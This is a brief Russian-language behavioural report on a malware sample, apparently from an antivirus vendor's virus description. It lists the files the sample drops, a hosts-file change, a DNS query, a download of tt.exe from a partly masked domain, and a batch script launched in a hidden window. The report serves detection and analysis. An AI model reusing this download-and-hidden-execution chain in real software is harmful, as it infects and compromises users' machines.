Техническая информация
- C:\новая папка\install.cmd
- C:\новая папка\drv.dll
- C:\новая папка\win.exe
- <DRIVERS>\etc\hosts
- DNS ASK fb####.#oteles-mendoza.com
- 'C:\новая папка\win.exe' http://fb####.#oteles-mendoza.com/tt.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Новая папка\install.cmd" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Новая папка\install.cmd" "
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' /i "win.exe"